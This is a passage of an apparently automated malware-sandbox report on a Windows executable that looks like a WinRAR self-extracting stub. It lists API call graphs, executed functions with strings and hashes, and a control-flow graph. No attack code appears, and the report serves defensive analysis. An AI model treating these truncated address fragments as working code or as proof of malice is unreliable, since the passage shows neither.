API calls 27698->27701 27699->27693 27711 7ff65a371374 CompareStringW 27699->27711 27700->27695 27703 7ff65a3654e0 27701->27703 27706 7ff65a36daef 27704->27706 27705 7ff65a36db0d 27705->27552 27706->27705 27707 7ff65a3520b0 33 API calls 27706->27707 27707->27705 27708->27561 27709->27692 27710->27694 27711->27693 27712->27571 27772->27070 27773->27074 27775 7ff65a36876f 27774->27775 27777 7ff65a36879f 27774->27777 27776 7ff65a3822ec 108 API calls 27775->27776 27779 7ff65a36878a 27776->27779 27780 7ff65a3822ec 108 API calls 27777->27780 27786 7ff65a3687eb 27777->27786 27782 7ff65a3822ec 108 API calls 27779->27782 27783 7ff65a3687d4 27780->27783 27781 7ff65a368805 27784 7ff65a3645dc 108 API calls 27781->27784 27782->27777 27785 7ff65a3822ec 108 API calls 27783->27785 27787 7ff65a368811 27784->27787 27785->27786 27789 7ff65a3645dc 27786->27789 27788->27066 27790 7ff65a3645f2 27789->27790 27792 7ff65a3645fa 27789->27792 27791 7ff65a36e8c4 108 API calls 27790->27791 27791->27792 27792->27781 27794 7ff65a37844c 4 API calls 27793->27794 27795 7ff65a37842a 27794->27795 27797 7ff65a378439 27795->27797 27805 7ff65a378484 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 27795->27805 27797->26089 27797->26090 27798->26095 27799->26101 27801 7ff65a378463 27800->27801 27802 7ff65a37845e 27800->27802 27801->26101 27806 7ff65a378510 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 27802->27806 27804->26104 27805->27797 27806->27801 27807->26130 27809->26154 27810->26170 27811->26177 27813->26182 25386 7ff65a3814cb 25387 7ff65a381422 25386->25387 25390 7ff65a381880 25387->25390 25416 7ff65a3814d8 25390->25416 25393 7ff65a38190b 25394 7ff65a3817e8 DloadReleaseSectionWriteAccess 6 API calls 25393->25394 25395 7ff65a381918 RaiseException 25394->25395 25396 7ff65a381461 25395->25396 25397 7ff65a381934 25398 7ff65a3819bd LoadLibraryExA 25397->25398 25399 7ff65a381b05 25397->25399 25400 7ff65a381a29 25397->25400 25403 7ff65a381a3d 25397->25403 25398->25400 25401 7ff65a3819d4 GetLastError 25398->25401 25424 7ff65a3817e8 25399->25424 25400->25403 25406 7ff65a381a34 FreeLibrary 25400->25406 25404 7ff65a3819e9 25401->25404 25405 7ff65a3819fe 25401->25405 25402 7ff65a381a9b GetProcAddress 25402->25399 25409 7ff65a381ab0 GetLastError 25402->25409 25403->25399 25403->25402 25404->25400 25404->25405 25408 7ff65a3817e8 DloadReleaseSectionWriteAccess 6 API calls 25405->25408 25406->25403 25410 7ff65a381a0b RaiseException 25408->25410 25411 7ff65a381ac5 25409->25411 25410->25396 25411->25399 25412 7ff65a3817e8 DloadReleaseSectionWriteAccess 6 API calls 25411->25412 25413 7ff65a381ae7 RaiseException 25412->25413 25414 7ff65a3814d8 _com_raise_error 6 API calls 25413->25414 25415 7ff65a381b01 25414->25415 25415->25399 25417 7ff65a3814ee 25416->25417 25423 7ff65a381553 25416->25423 25432 7ff65a381584 25417->25432 25420 7ff65a38154e 25422 7ff65a381584 DloadReleaseSectionWriteAccess 3 API calls 25420->25422 25422->25423 25423->25393 25423->25397 25425 7ff65a3817f8 25424->25425 25431 7ff65a381851 25424->25431 25426 7ff65a381584 DloadReleaseSectionWriteAccess 3 API calls 25425->25426 25427 7ff65a3817fd 25426->25427 25428 7ff65a38184c 25427->25428 25429 7ff65a381758 DloadProtectSection 3 API calls 25427->25429 25430 7ff65a381584 DloadReleaseSectionWriteAccess 3 API calls 25428->25430 25429->25428 25430->25431 25431->25396 25433 7ff65a3814f3 25432->25433 25434 7ff65a38159f 25432->25434 25433->25420 25439 7ff65a381758 25433->25439 25434->25433 25435 7ff65a3815a4 GetModuleHandleW 25434->25435 25436 7ff65a3815be GetProcAddress 25435->25436 25437 7ff65a3815b9 25435->25437 25436->25437 25438 7ff65a3815d3 GetProcAddress 25436->25438 25437->25433 25438->25437 25440 7ff65a38177a DloadProtectSection 25439->25440 25441 7ff65a3817ba VirtualProtect 25440->25441 25442 7ff65a381782 25440->25442 25444 7ff65a381624 VirtualQuery GetSystemInfo 25440->25444 25441->25442 25442->25420 25444->25441 27815 7ff65a38d8cc 27816 7ff65a38d917 27815->27816 27820 7ff65a38d8db _set_errno_from_matherr 27815->27820 27822 7ff65a38d61c 15 API calls _set_errno_from_matherr 27816->27822 27818 7ff65a38d8fe RtlAllocateHeap 27819 7ff65a38d915 27818->27819 27818->27820 27820->27816 27820->27818 27821 7ff65a38bb40 _set_errno_from_matherr 2 API calls 27820->27821 27821->27820 27822->27819 27858 7ff65a382cec 27883 7ff65a38277c 27858->27883 27861 7ff65a382e38 27981 7ff65a3830f0 7 API calls 2 library calls 27861->27981 27862 7ff65a382d08 __scrt_acquire_startup_lock 27864 7ff65a382e42 27862->27864 27865 7ff65a382d26 27862->27865 27982 7ff65a3830f0 7 API calls 2 library calls 27864->27982 27868 7ff65a382d4b 27865->27868 27874 7ff65a382d68 __scrt_release_startup_lock 27865->27874 27891 7ff65a38cd10 27865->27891 27867 7ff65a382e4d abort 27870 7ff65a382dd1 27895 7ff65a38323c 27870->27895 27872 7ff65a382dd6 27898 7ff65a38cca0 27872->27898 27874->27870 27978 7ff65a38bfd0 35 API calls __GSHandlerCheck_EH 27874->27978 27983 7ff65a382f30 27883->27983 27886 7ff65a3827ab 27985 7ff65a38cbd0 27886->27985 27890 7ff65a3827a7 27890->27861 27890->27862 27892 7ff65a38cd6b 27891->27892 27893 7ff65a38cd4c 27891->27893 27892->27874 27893->27892 28002 7ff65a351120 27893->28002 27896 7ff65a383c70 __scrt_get_show_window_mode 27895->27896 27897 7ff65a383253 GetStartupInfoW 27896->27897 27897->27872 28008 7ff65a3906b0 27898->28008 27900 7ff65a38ccaf 27901 7ff65a382dde 27900->27901 28012 7ff65a390a40 35 API calls _snwprintf 27900->28012 27903 7ff65a3806d4 27901->27903 28014 7ff65a36df4c 27903->28014 27906 7ff65a36629c 35 API calls 27907 7ff65a38071a 27906->27907 28091 7ff65a3793ec 27907->28091 27909 7ff65a380724 __scrt_get_show_window_mode 28096 7ff65a379994 27909->28096 27911 7ff65a3808ee GetCommandLineW 27913 7ff65a380900 27911->27913 27953 7ff65a380ac2 27911->27953 27912 7ff65a387884 _invalid_parameter_noinfo_noreturn 31 API calls 27914 7ff65a380d62 27912->27914 27920 7ff65a35129c 33 API calls 27913->27920 27917 7ff65a387884 _invalid_parameter_noinfo_noreturn 31 API calls 27914->27917 27915 7ff65a366414 34 API calls 27918 7ff65a380ad1 27915->27918 27916 7ff65a380799 27916->27911 27960 7ff65a380d5c 27916->27960 27919 7ff65a380d68 27917->27919 27922 7ff65a351fa0 31 API calls 27918->27922 27929 7ff65a380ae8 BuildCatchObjectHelperInternal 27918->27929 27926 7ff65a381880 _com_raise_error 14 API calls 27919->27926 27921 7ff65a380925 27920->27921 28137 7ff65a37ca50 102 API calls 3 library calls 27921->28137 27922->27929 27923 7ff65a351fa0 31 API calls 27924 7ff65a380b13 SetEnvironmentVariableW GetLocalTime 27923->27924 27927 7ff65a363de8 swprintf 46 API calls 27924->27927 27926->27919 27930 7ff65a380b98 SetEnvironmentVariableW GetModuleHandleW LoadIconW 27927->27930 27928 7ff65a38092f 27928->27914 27932 7ff65a380a5b 27928->27932 27933 7ff65a380979 OpenFileMappingW 27928->27933 27929->27923 28106 7ff65a37af94 LoadBitmapW 27930->28106 27940 7ff65a35129c 33 API calls 27932->27940 27935 7ff65a380999 MapViewOfFile 27933->27935 27936 7ff65a380a50 CloseHandle 27933->27936 27935->27936 27938 7ff65a3809bf UnmapViewOfFile MapViewOfFile 27935->27938 27936->27953 27938->27936 27941 7ff65a3809f1 27938->27941 27939 7ff65a380bf5 28130 7ff65a376734 27939->28130 27944 7ff65a380a80 27940->27944 28138 7ff65a37a110 33 API calls 2 library calls 27941->28138 28142 7ff65a37fc8c 35 API calls 2 library calls 27944->28142 27946 7ff65a380a01 28139 7ff65a37fc8c 35 API calls 2 library calls 27946->28139 27948 7ff65a380a8a 27948->27953 27955 7ff65a380d57 27948->27955 27950 7ff65a376734 33 API calls 27952 7ff65a380c07 DialogBoxParamW 27950->27952 27951 7ff65a380a10 28140 7ff65a36b970 102 API calls 27951->28140 27961 7ff65a380c53 27952->27961 27953->27915 27958 7ff65a387884 _invalid_parameter_noinfo_noreturn 31 API calls 27955->27958 27956 7ff65a380a25 28141 7ff65a36babc 102 API calls 27956->28141 27958->27960 27959 7ff65a380a38 27965 7ff65a380a47 UnmapViewOfFile 27959->27965 27960->27912 27962 7ff65a380c6c 27961->27962 27963 7ff65a380c66 Sleep 27961->27963 27964 7ff65a380c7a 27962->27964 28143 7ff65a379ecc 49 API calls 2 library calls 27962->28143 27963->27962 27967 7ff65a380c86 DeleteObject 27964->27967 27965->27936 27968 7ff65a380ca5 27967->27968 27969 7ff65a380c9f DeleteObject 27967->27969 27970 7ff65a380ced 27968->27970 27971 7ff65a380cdb 27968->27971 27969->27968 28133 7ff65a379464 27970->28133 28144 7ff65a37fda4 PeekMessageW GetMessageW TranslateMessage DispatchMessageW WaitForSingleObject 27971->28144 27974 7ff65a380ce0 CloseHandle 27974->27970 27978->27870 27981->27864 27982->27867 27984 7ff65a38279e __scrt_dllmain_crt_thread_attach 27983->27984 27984->27886 27984->27890 27986 7ff65a390ccc 27985->27986 27987 7ff65a3827b0 27986->27987 27990 7ff65a38eb80 27986->27990 27987->27890 27989 7ff65a385120 7 API calls 2 library calls 27987->27989 27989->27890 28001 7ff65a38f318 EnterCriticalSection 27990->28001 28003 7ff65a3591c8 35 API calls 28002->28003 28004 7ff65a351130 28003->28004 28007 7ff65a38293c 34 API calls 28004->28007 28006 7ff65a382981 28006->27893 28007->28006 28009 7ff65a3906c9 28008->28009 28010 7ff65a3906bd 28008->28010 28009->27900 28013 7ff65a3904f0 48 API calls 4 library calls 28010->28013 28012->27900 28013->28009 28145 7ff65a3823d0 28014->28145 28017 7ff65a36dff7 28019 7ff65a36e47f 28017->28019 28152 7ff65a38b708 39 API calls _snwprintf 28017->28152 28018 7ff65a36dfa2 GetProcAddress 28020 7ff65a36dfb7 28018->28020 28021 7ff65a36dfcf GetProcAddress 28018->28021 28023 7ff65a366414 34 API calls 28019->28023 28020->28021 28021->28017 28024 7ff65a36dfe4 28021->28024 28026 7ff65a36e488 28023->28026 28024->28017 28025 7ff65a36e32c 28025->28019 28027 7ff65a36e336 28025->28027 28028 7ff65a367db4 47 API calls 28026->28028 28029 7ff65a366414 34 API calls 28027->28029 28055 7ff65a36e496 28028->28055 28030 7ff65a36e33f CreateFileW 28029->28030 28032 7ff65a36e46c CloseHandle 28030->28032 28033 7ff65a36e37f SetFilePointer 28030->28033 28035 7ff65a351fa0 31 API calls 28032->28035 28033->28032 28034 7ff65a36e398 ReadFile 28033->28034 28034->28032 28036 7ff65a36e3c0 28034->28036 28035->28019 28037 7ff65a36e77c 28036->28037 28038 7ff65a36e3d4 28036->28038 28158 7ff65a3825a4 8 API calls 28037->28158 28043 7ff65a35129c 33 API calls 28038->28043 28040 7ff65a36e781 28041 7ff65a36e4ba CompareStringW 28041->28055 28042 7ff65a35129c 33 API calls 28042->28055 28048 7ff65a36e40b 28043->28048 28044 7ff65a368050 47 API calls 28044->28055 28046 7ff65a36e5b6 28049 7ff65a36e5c4 28046->28049 28050 7ff65a36e73e 28046->28050 28047 7ff65a351fa0 31 API calls 28047->28055 28052 7ff65a36e457 28048->28052 28153 7ff65a36d05c 33 API calls 28048->28153 28154 7ff65a367e70 47 API calls 28049->28154 28054 7ff65a351fa0 31 API calls 28050->28054 28051 7ff65a36327c 51 API calls 28051->28055 28056 7ff65a351fa0 31 API calls 28052->28056 28058 7ff65a36e747 28054->28058 28055->28041 28055->28042 28055->28044 28055->28047 28055->28051 28076 7ff65a36e548 28055->28076 28147 7ff65a365164 28055->28147 28059 7ff65a36e461 28056->28059 28057 7ff65a36e5cd 28060 7ff65a365164 9 API calls 28057->28060 28062 7ff65a351fa0 31 API calls 28058->28062 28063 7ff65a351fa0 31 API calls 28059->28063 28064 7ff65a36e5d2 28060->28064 28061 7ff65a35129c 33 API calls 28061->28076 28065 7ff65a36e751 28062->28065 28063->28032 28066 7ff65a36e682 28064->28066 28073 7ff65a36e5dd 28064->28073 28068 7ff65a3822a0 _handle_error 8 API calls 28065->28068 28070 7ff65a36da14 48 API calls 28066->28070 28067 7ff65a368050 47 API calls 28067->28076 28069 7ff65a36e760 28068->28069 28069->27906 28071 7ff65a36e6c7 AllocConsole 28070->28071 28074 7ff65a36e677 28071->28074 28075 7ff65a36e6d1 GetCurrentProcessId AttachConsole 28071->28075 28072 7ff65a351fa0 31 API calls 28072->28076 28079 7ff65a36aaa0 48 API calls 28073->28079 28157 7ff65a3519e0 31 API calls _invalid_parameter_noinfo_noreturn 28074->28157 28077 7ff65a36e6e8 28075->28077 28076->28046 28076->28061 28076->28067 28076->28072 28078 7ff65a36327c 51 API calls 28076->28078 28084 7ff65a36e6f4 GetStdHandle WriteConsoleW Sleep FreeConsole 28077->28084 28078->28076 28081 7ff65a36e621 28079->28081 28083 7ff65a36da14 48 API calls 28081->28083 28082 7ff65a36e735 ExitProcess 28085 7ff65a36e63f 28083->28085 28084->28074 28086 7ff65a36aaa0 48 API calls 28085->28086 28087 7ff65a36e64a 28086->28087 28155 7ff65a36dba8 33 API calls 28087->28155 28089 7ff65a36e656 28156 7ff65a3519e0 31 API calls _invalid_parameter_noinfo_noreturn 28089->28156 28092 7ff65a36dd04 28091->28092 28093 7ff65a379401 OleInitialize 28092->28093 28094 7ff65a379427 28093->28094 28095 7ff65a37944d SHGetMalloc 28094->28095 28095->27909 28097 7ff65a3799c9 28096->28097 28100 7ff65a3799ce BuildCatchObjectHelperInternal 28096->28100 28098 7ff65a351fa0 31 API calls 28097->28098 28098->28100 28099 7ff65a351fa0 31 API calls 28105 7ff65a3799fd BuildCatchObjectHelperInternal 28099->28105 28100->28099 28100->28105 28101 7ff65a351fa0 31 API calls 28102 7ff65a379a2c BuildCatchObjectHelperInternal 28101->28102 28103 7ff65a351fa0 31 API calls 28102->28103 28104 7ff65a379a5b BuildCatchObjectHelperInternal 28102->28104 28103->28104 28104->27916 28105->28101 28105->28102 28107 7ff65a37afc6 28106->28107 28108 7ff65a37afbe 28106->28108 28110 7ff65a37afe3 28107->28110 28111 7ff65a37afce GetObjectW 28107->28111 28159 7ff65a3785a4 FindResourceW 28108->28159 28112 7ff65a37841c 4 API calls 28110->28112 28111->28110 28113 7ff65a37aff8 28112->28113 28114 7ff65a37b04e 28113->28114 28115 7ff65a37b01e 28113->28115 28117 7ff65a3785a4 10 API calls 28113->28117 28125 7ff65a36986c 28114->28125 28173 7ff65a378484 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 28115->28173 28119 7ff65a37b00a 28117->28119 28118 7ff65a37b027 28121 7ff65a37844c 4 API calls 28118->28121 28119->28115 28120 7ff65a37b012 DeleteObject 28119->28120 28120->28115 28122 7ff65a37b032 28121->28122 28174 7ff65a378d74 16 API calls _handle_error 28122->28174 28124 7ff65a37b03f DeleteObject 28124->28114 28175 7ff65a36989c 28125->28175 28127 7ff65a36987a 28242 7ff65a36a3fc GetModuleHandleW FindResourceW 28127->28242 28129 7ff65a369882 28129->27939 28131 7ff65a382150 33 API calls 28130->28131 28132 7ff65a37677a 28131->28132 28132->27950 28134 7ff65a379481 28133->28134 28135 7ff65a37948a OleUninitialize 28134->28135 28136 7ff65a3be330 28135->28136 28137->27928 28138->27946 28139->27951 28140->27956 28141->27959 28142->27948 28143->27964 28144->27974 28146 7ff65a36df70 GetModuleHandleW 28145->28146 28146->28017 28146->28018 28148 7ff65a365188 GetVersionExW 28147->28148 28149 7ff65a3651bb 28147->28149 28148->28149 28150 7ff65a3822a0 _handle_error 8 API calls 28149->28150 28151 7ff65a3651e8 28150->28151 28151->28055 28152->28025 28153->28048 28154->28057 28155->28089 28156->28074 28157->28082 28158->28040 28160 7ff65a37871b 28159->28160 28161 7ff65a3785cf SizeofResource 28159->28161 28160->28107 28161->28160 28162 7ff65a3785e9 LoadResource 28161->28162 28162->28160 28163 7ff65a378602 LockResource 28162->28163 28163->28160 28164 7ff65a378617 GlobalAlloc 28163->28164 28164->28160 28165 7ff65a378638 GlobalLock 28164->28165 28166 7ff65a378712 GlobalFree 28165->28166 28167 7ff65a37864a BuildCatchObjectHelperInternal 28165->28167 28166->28160 28168 7ff65a378709 GlobalUnlock 28167->28168 28169 7ff65a378676 GdipAlloc 28167->28169 28168->28166 28170 7ff65a37868b 28169->28170 28170->28168 28171 7ff65a3786da GdipCreateHBITMAPFromBitmap 28170->28171 28172 7ff65a3786f2 28170->28172 28171->28172 28172->28168 28173->28118 28174->28124 28178 7ff65a3698be _snwprintf 28175->28178 28176 7ff65a369933 28252 7ff65a366870 48 API calls 28176->28252 28178->28176 28180 7ff65a369a49 28178->28180 28179 7ff65a351fa0 31 API calls 28182 7ff65a3699bd 28179->28182 28180->28182 28184 7ff65a3520b0 33 API calls 28180->28184 28181 7ff65a36993d BuildCatchObjectHelperInternal 28181->28179 28183 7ff65a36a3ee 28181->28183 28186 7ff65a362480 54 API calls 28182->28186 28185 7ff65a387884 _invalid_parameter_noinfo_noreturn 31 API calls 28183->28185 28184->28182 28187 7ff65a36a3f4 28185->28187 28188 7ff65a3699da 28186->28188 28190 7ff65a387884 _invalid_parameter_noinfo_noreturn 31 API calls 28187->28190 28189 7ff65a3699e2 28188->28189 28196 7ff65a369a6d 28188->28196 28192 7ff65a362004 100 API calls 28189->28192 28193 7ff65a36a3fa 28190->28193 28191 7ff65a369ad7 28244 7ff65a38a3d0 28191->28244 28194 7ff65a3699eb 28192->28194 28194->28187 28197 7ff65a369a26 28194->28197 28196->28191 28202 7ff65a368e18 33 API calls 28196->28202 28200 7ff65a3822a0 _handle_error 8 API calls 28197->28200 28199 7ff65a38a3d0 31 API calls 28213 7ff65a369b17 __vcrt_FlsAlloc 28199->28213 28201 7ff65a36a3ce 28200->28201 28201->28127 28202->28196 28203 7ff65a369c49 28204 7ff65a362a60 101 API calls 28203->28204 28216 7ff65a369d1c 28203->28216 28207 7ff65a369c61 28204->28207 28205 7ff65a362b70 101 API calls 28205->28213 28206 7ff65a362890 104 API calls 28206->28213 28208 7ff65a362890 104 API calls 28207->28208 28207->28216 28214 7ff65a369c89 28208->28214 28209 7ff65a362004 100 API calls 28211 7ff65a36a3b5 28209->28211 28210 7ff65a362a60 101 API calls 28210->28213 28212 7ff65a351fa0 31 API calls 28211->28212 28212->28197 28213->28203 28213->28205 28213->28206 28213->28210 28213->28216 28214->28216 28237 7ff65a369c97 __vcrt_FlsAlloc 28214->28237 28253 7ff65a370b3c MultiByteToWideChar 28214->28253 28216->28209 28217 7ff65a36a1ac 28227 7ff65a36a282 28217->28227 28259 7ff65a38cf10 31 API calls 2 library calls 28217->28259 28219 7ff65a36a117 28219->28217 28256 7ff65a38cf10 31 API calls 2 library calls 28219->28256 28222 7ff65a36a10b 28222->28127 28223 7ff65a36a26e 28223->28227 28261 7ff65a368c90 33 API calls 2 library calls 28223->28261 28224 7ff65a36a209 28260 7ff65a38b73c 31 API calls _invalid_parameter_noinfo_noreturn 28224->28260 28225 7ff65a36a362 28226 7ff65a38a3d0 31 API calls 28225->28226 28230 7ff65a36a38b 28226->28230 28227->28225 28228 7ff65a368e18 33 API calls 28227->28228 28228->28227 28232 7ff65a38a3d0 31 API calls 28230->28232 28231 7ff65a36a12d 28257 7ff65a38b73c 31 API calls _invalid_parameter_noinfo_noreturn 28231->28257 28232->28216 28234 7ff65a36a198 28234->28217 28258 7ff65a368c90 33 API calls 2 library calls 28234->28258 28235 7ff65a370ee8 WideCharToMultiByte 28235->28237 28237->28216 28237->28217 28237->28219 28237->28222 28237->28235 28238 7ff65a36a3e9 28237->28238 28254 7ff65a36aa48 45 API calls 2 library calls 28237->28254 28255 7ff65a38a1f0 31 API calls 2 library calls 28237->28255 28262 7ff65a3825a4 8 API calls 28238->28262 28243 7ff65a36a428 28242->28243 28243->28129 28245 7ff65a38a3fd 28244->28245 28251 7ff65a38a412 28245->28251 28263 7ff65a38d61c 15 API calls _set_errno_from_matherr 28245->28263 28247 7ff65a38a407 28264 7ff65a387864 31 API calls _invalid_parameter_noinfo 28247->28264 28249 7ff65a3822a0 _handle_error 8 API calls 28250 7ff65a369af7 28249->28250 28250->28199 28251->28249 28252->28181 28253->28237 28254->28237 28255->28237 28256->28231 28257->28234 28258->28217 28259->28224 28260->28223 28261->28227 28262->28183 28263->28247 28264->28251 28290 7ff65a380d75 14 API calls _com_raise_error

                                      Executed Functions

                                      Function 00007FF65A37B110 Relevance: 123.9, APIs: 60, Strings: 10, Instructions: 1421windowfilesleepCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: Item$_invalid_parameter_noinfo_noreturn$Message$DialogText$ButtonChecked$FileSend$ErrorLast$CloseFindFocusLoadStringView$CommandConcurrency::cancel_current_taskCountCreateDispatchEnableExecuteFirstHandleLineMappingParamShellSleepTickTranslateUnmapWindow
                                      • String ID: %s %s$-el -s2 "-d%s" "-sp%s"$@$LICENSEDLG$REPLACEFILEDLG$STARTDLG$__tmp_rar_sfx_access_check_$p$runas$winrarsfxmappingfile.tmp
                                      • API String ID: 3303814210-2702805183
                                      • Opcode ID: d1df558db1793713a62bc4f13a1729d6542dfbd792ff814912b0ac4e491caeb1
                                      • Instruction ID: 0bb91e49a06da336ee01bf3fcd9cc9746c02c66bc5736640e93311e7af58bbc2
                                      • Opcode Fuzzy Hash: d1df558db1793713a62bc4f13a1729d6542dfbd792ff814912b0ac4e491caeb1
                                      • Instruction Fuzzy Hash: 8FD2D322E09B8781FA20DF64E8502F96761EF85788F5842B5D94DE77A6EF3CE644C700
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A37CE08 Relevance: 65.0, APIs: 26, Strings: 10, Instructions: 1963fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task$ButtonCheckedFileMove$DialogItemPathTemp
                                      • String ID: .lnk$.tmp$<br>$@set:user$HIDE$MAX$MIN$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$lnk
                                      • API String ID: 1830998149-3916287355
                                      • Opcode ID: 264cb41524a0a5fc932b712193b35318942710b9b8aa49385f8dc84018ce549e
                                      • Instruction ID: 687a6c8cd1b89bda3f0d698785f09dd00f429cadc8749db3bd6f2a81305ac1a0
                                      • Opcode Fuzzy Hash: 264cb41524a0a5fc932b712193b35318942710b9b8aa49385f8dc84018ce549e
                                      • Instruction Fuzzy Hash: FF139D62B04B82D9EB10DF64D8802EC27A1EF4479CF581676DA1DE7AD9DF38E685C340
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A3806D4 Relevance: 45.9, APIs: 21, Strings: 5, Instructions: 380filesleeptimeCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1466 7ff65a3806d4-7ff65a3807a9 call 7ff65a36df4c call 7ff65a36629c call 7ff65a3793ec call 7ff65a383c70 call 7ff65a379994 1477 7ff65a3807ab-7ff65a3807c0 1466->1477 1478 7ff65a3807e0-7ff65a380803 1466->1478 1481 7ff65a3807db call 7ff65a38218c 1477->1481 1482 7ff65a3807c2-7ff65a3807d5 1477->1482 1479 7ff65a38083a-7ff65a38085d 1478->1479 1480 7ff65a380805-7ff65a38081a 1478->1480 1485 7ff65a380894-7ff65a3808b7 1479->1485 1486 7ff65a38085f-7ff65a380874 1479->1486 1483 7ff65a38081c-7ff65a38082f 1480->1483 1484 7ff65a380835 call 7ff65a38218c 1480->1484 1481->1478 1482->1481 1487 7ff65a380d5d-7ff65a380d62 call 7ff65a387884 1482->1487 1483->1484 1483->1487 1484->1479 1492 7ff65a3808b9-7ff65a3808ce 1485->1492 1493 7ff65a3808ee-7ff65a3808fa GetCommandLineW 1485->1493 1490 7ff65a380876-7ff65a380889 1486->1490 1491 7ff65a38088f call 7ff65a38218c 1486->1491 1501 7ff65a380d63-7ff65a380d70 call 7ff65a387884 1487->1501 1490->1487 1490->1491 1491->1485 1498 7ff65a3808e9 call 7ff65a38218c 1492->1498 1499 7ff65a3808d0-7ff65a3808e3 1492->1499 1495 7ff65a380ac7-7ff65a380ade call 7ff65a366414 1493->1495 1496 7ff65a380900-7ff65a380937 call 7ff65a3878fc call 7ff65a35129c call 7ff65a37ca50 1493->1496 1510 7ff65a380b09-7ff65a380c64 call 7ff65a351fa0 SetEnvironmentVariableW GetLocalTime call 7ff65a363de8 SetEnvironmentVariableW GetModuleHandleW LoadIconW call 7ff65a37af94 call 7ff65a36986c call 7ff65a376734 * 2 DialogBoxParamW call 7ff65a376828 * 2 1495->1510 1511 7ff65a380ae0-7ff65a380b05 call 7ff65a351fa0 call 7ff65a3835c0 1495->1511 1525 7ff65a38096c-7ff65a380973 1496->1525 1526 7ff65a380939-7ff65a38094c 1496->1526 1498->1493 1499->1487 1499->1498 1512 7ff65a380d75-7ff65a380daf call 7ff65a381880 1501->1512 1573 7ff65a380c6c-7ff65a380c73 1510->1573 1574 7ff65a380c66 Sleep 1510->1574 1511->1510 1522 7ff65a380db4-7ff65a380e01 1512->1522 1522->1512 1532 7ff65a380a5b-7ff65a380a92 call 7ff65a3878fc call 7ff65a35129c call 7ff65a37fc8c 1525->1532 1533 7ff65a380979-7ff65a380993 OpenFileMappingW 1525->1533 1530 7ff65a380967 call 7ff65a38218c 1526->1530 1531 7ff65a38094e-7ff65a380961 1526->1531 1530->1525 1531->1501 1531->1530 1532->1495 1555 7ff65a380a94-7ff65a380aa7 1532->1555 1538 7ff65a380999-7ff65a3809b9 MapViewOfFile 1533->1538 1539 7ff65a380a50-7ff65a380a59 CloseHandle 1533->1539 1538->1539 1542 7ff65a3809bf-7ff65a3809ef UnmapViewOfFile MapViewOfFile 1538->1542 1539->1495 1542->1539 1545 7ff65a3809f1-7ff65a380a4a call 7ff65a37a110 call 7ff65a37fc8c call 7ff65a36b970 call 7ff65a36babc call 7ff65a36bb2c UnmapViewOfFile 1542->1545 1545->1539 1558 7ff65a380aa9-7ff65a380abc 1555->1558 1559 7ff65a380ac2 call 7ff65a38218c 1555->1559 1558->1559 1562 7ff65a380d57-7ff65a380d5c call 7ff65a387884 1558->1562 1559->1495 1562->1487 1575 7ff65a380c7a-7ff65a380c9d call 7ff65a36b89c DeleteObject 1573->1575 1576 7ff65a380c75 call 7ff65a379ecc 1573->1576 1574->1573 1581 7ff65a380ca5-7ff65a380cac 1575->1581 1582 7ff65a380c9f DeleteObject 1575->1582 1576->1575 1583 7ff65a380cc8-7ff65a380cd9 1581->1583 1584 7ff65a380cae-7ff65a380cb5 1581->1584 1582->1581 1586 7ff65a380ced-7ff65a380cfa 1583->1586 1587 7ff65a380cdb-7ff65a380ce7 call 7ff65a37fda4 CloseHandle 1583->1587 1584->1583 1585 7ff65a380cb7-7ff65a380cc3 call 7ff65a35ba1c 1584->1585 1585->1583 1588 7ff65a380cfc-7ff65a380d09 1586->1588 1589 7ff65a380d1f-7ff65a380d24 call 7ff65a379464 1586->1589 1587->1586 1592 7ff65a380d0b-7ff65a380d13 1588->1592 1593 7ff65a380d19-7ff65a380d1b 1588->1593 1598 7ff65a380d29-7ff65a380d56 call 7ff65a3822a0 1589->1598 1592->1589 1596 7ff65a380d15-7ff65a380d17 1592->1596 1593->1589 1597 7ff65a380d1d 1593->1597 1596->1589 1597->1589
                                      APIs
                                      Strings
                                      Memory Dump Source
